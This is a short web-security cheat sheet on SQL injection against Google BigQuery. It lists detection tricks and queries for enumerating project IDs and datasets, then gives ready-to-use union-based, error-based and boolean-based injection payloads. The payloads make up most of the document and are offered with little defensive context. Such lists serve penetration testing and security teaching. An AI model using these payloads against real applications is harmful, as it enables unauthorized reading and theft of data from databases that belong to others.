Google BigQuery SQL Injection
Google BigQuery SQL Injection is a type of security vulnerability where an attacker can execute arbitrary SQL queries on a Google BigQuery database by manipulating user inputs that are incorporated into SQL queries without proper sanitization. This can lead to unauthorized data access, data manipulation, or other malicious activities.
Summary
Detection
- Use a classic single quote to trigger an error:
'
- Identify BigQuery using backtick notation:
SELECT .... FROM `` AS ...
| SQL Query |
Description |
SELECT @@project_id |
Gathering project id |
SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA |
Gathering all dataset names |
select * from project_id.dataset_name.table_name |
Gathering data from specific project id & dataset |
BigQuery Comment
| Type |
Description |
# |
Hash comment |
/* PostgreSQL Comment */ |
C-style comment |
BigQuery Union Based
UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name
' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#
BigQuery Error Based
| SQL Query |
Description |
' OR if(1/(length((select('a')))-1)=1,true,false) OR ' |
Division by zero |
select CAST(@@project_id AS INT64) |
Casting |
BigQuery Boolean Based
' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#
BigQuery Time Based
- Time based functions does not exist in the BigQuery syntax.
References
